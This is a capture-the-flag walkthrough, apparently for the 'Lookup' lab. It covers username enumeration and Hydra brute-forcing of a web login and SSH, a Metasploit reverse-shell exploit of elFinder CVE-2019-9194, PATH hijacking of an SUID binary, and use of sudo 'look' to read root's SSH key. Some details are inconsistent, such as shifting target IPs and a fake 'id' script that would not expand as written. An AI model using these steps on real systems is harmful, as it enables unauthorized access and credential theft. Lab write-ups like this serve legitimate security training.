Lookup

1. Initial Enumeration

a. Full Port Scan

We begin by scanning all TCP ports on the target using nmap with a high packet rate to speed up the process. The target IP is set as an environment variable for convenience.

export TARGET_IP=10.10.123.47
nmap -p- -Pn --min-rate 5000 $TARGET_IP

Results:

Not shown: 65376 closed tcp ports (reset), 157 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

b. Web Service Enumeration

Perform a targeted scan on port 80 to gather service information and potentially trigger additional behavior (like following redirects).

nmap -p80 -Pn -sV -sC $TARGET_IP

Results:

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://lookup.thm
|_http-server-header: Apache/2.4.41 (Ubuntu)

c. Local Hostname Resolution

Update your /etc/hosts file to resolve lookup.thm to the target IP.

/etc/hosts

10.10.123.47    lookup.thm

Send a POST request to the login page to see how the application handles different credentials. For example:

Test 1:

POST /login.php HTTP/1.1
Host: lookup.thm
...
username=test&password=test

Response:

HTTP/1.1 200 OK
...
Wrong username or password. Please try again.<br>Redirecting in 3 seconds.

Test 2:

POST /login.php HTTP/1.1
Host: lookup.thm
...
username=admin&password=test

Response:

HTTP/1.1 200 OK
...
Wrong password. Please try again.<br>Redirecting in 3 seconds.

Explanation:
Notice the slight difference in the responses. The first tells you that both username and password are wrong, while the second indicates that the username exists (but the password is incorrect). This gives us a vector for enumeration.

b. Username Enumeration with Hydra

We can automate username discovery using Hydra. In this case, we use a large username list and a dummy password. The failure message “Wrong username or password” is our marker for an invalid user.

hydra -L /usr/share/seclists/Usernames/xato-net-10-million-usernames-dup.txt -p dummy_password lookup.thm http-post-form "/login.php:username=^USER^&password=^PASS^:Wrong username or password"

Explanation:
Hydra will report any usernames where the response is different from “Wrong username or password” (e.g., “Wrong password”) indicating the username exists.

Example Output:

[80][http-post-form] host: lookup.thm   login: admin   password: dummy_password
[80][http-post-form] host: lookup.thm   login: jose   password: dummy_password

c. Password Cracking with Hydra

After identifying a valid username (for example, jose), we brute-force the password using a wordlist. This time we monitor for the “Wrong password” message since we know the username exists.

hydra -l jose -P /usr/share/wordlists/rockyou.txt lookup.thm http-post-form "/login.php:username=^USER^&password=^PASS^:Wrong password" -vV -t 20 -f

-f: Stops the attack once a valid credential is found.
Hydra will notify us when the response differs from “Wrong password,” meaning we’ve likely cracked the password.

Example Output:

[80][http-post-form] host: lookup.thm   login: jose   password: password123

After successfully logging in with the credentials for jose, you are redirected to files.lookup.thm where you find an instance of the elFinder web-based file manager.

a. Identify the Vulnerability

In the elFinder interface, click on the "About this software" button (look for the ? icon).
Note the version: 2.1.47.
A quick Google search (e.g., "elFinder 2.1.47") reveals a known vulnerability: CVE-2019-9194.

Explanation:
This vulnerability allows an attacker to abuse how elFinder processes file uploads and image manipulations (specifically image rotation) to execute shell commands, effectively writing a PHP web shell on the server.

b. Exploiting elFinder via Metasploit

We use Metasploit’s module for this vulnerability:

msfconsole -q

Inside Metasploit:

msf6 > search elfinder
msf6 > use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection
msf6 > show options

Configure the module:

msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set RHOSTS files.lookup.thm
msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set LHOST 10.2.17.44  # Your VPN/attacker IP
msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run

Explanation:
The module leverages the vulnerability to inject commands via the image rotation functionality. Once exploited, you will gain a shell (Meterpreter) as the web server user (typically www-data).

4. Post-Exploitation and Privilege Escalation

After exploiting elFinder, you obtain a shell on the target as www-data:

meterpreter > shell
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Check for user information and other clues:

cat /etc/passwd    # Identify users (e.g., 'think')
ls -a /home/think  # Look for hidden files, e.g., .passwords
find / -perm -4000 2>/dev/null  # Find SUID binaries (e.g., /usr/sbin/pwm)

Observation:
We discover an SUID binary /usr/sbin/pwm that seems to be a potential privilege escalation vector.

a. Understanding the Vulnerability in `pwm`

Running pwm as www-data returns:

/usr/sbin/pwm

Output example:

[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: www-data
[-] File /home/www-data/.passwords not found

Explanation:
The binary calls the id command without specifying a full path. This means we can manipulate the PATH environment variable so that a fake id is executed instead.

b. Crafting and Deploying a Fake `id` Command

1. Create a Fake `id` Script

In the /tmp directory, create a script that outputs the result of id think (for the target user think):

id
cat > /tmp/id << 'EOF'
#!/bin/bash
echo '$(id think)'
EOF

Explanation:
This script, when run, will output the details of the user think instead of the actual www-data information.

2. Make the Fake Script Executable

chmod +x /tmp/id

3. Manipulate the PATH

Prepend /tmp to the PATH so that our fake id is executed before the real one:

export PATH=/tmp:$PATH

4. Execute the Vulnerable Binary

Now, run the pwm binary:

/usr/sbin/pwm

Explanation:
Because of the modified PATH, when pwm calls id, it will run our script, tricking pwm into acting on behalf of the user think.

c. Final Escalation to Root

Once you have the credentials for think, use them to SSH into the system:

hydra -l think -P passwords.txt 10.10.207.160 ssh

Example Output:

[22][ssh] host: 10.10.207.160   login: think   password: josemario.AKA(think)

SSH as think:

ssh think@10.10.207.160 # Password: josemario.AKA(think)
$ id
uid=1000(think) gid=1000(think) groups=1000(think)

Check sudo permissions:

echo "josemario.AKA(think)" | sudo -S -l

Observation:
The output shows that user think can run /usr/bin/look via sudo. This binary is known to be exploitable through GTFOBins.

Using the look binary to read a file (for instance, the private SSH key located at /root/.ssh/id_rsa):

LFILE=/root/.ssh/id_rsa
sudo look '' "$LFILE"

# Transfer the key to local and:
chmod 600 id_rsa

Finally, use the key to SSH as root:

ssh -i id_rsa root@10.10.207.160
$ id
uid=0(root) gid=0(root) groups=0(root)

1. Initial Enumeration​

a. Full Port Scan​

b. Web Service Enumeration​

c. Local Hostname Resolution​

2. Application Login Testing and Credential Discovery​

a. Manual Login Attempts​

b. Username Enumeration with Hydra​

c. Password Cracking with Hydra​

3. Post-Login Exploration and Exploitation​

a. Identify the Vulnerability​

b. Exploiting elFinder via Metasploit​

4. Post-Exploitation and Privilege Escalation​

a. Understanding the Vulnerability in pwm​

b. Crafting and Deploying a Fake id Command​

1. Create a Fake id Script​

2. Make the Fake Script Executable​

3. Manipulate the PATH​

4. Execute the Vulnerable Binary​

c. Final Escalation to Root​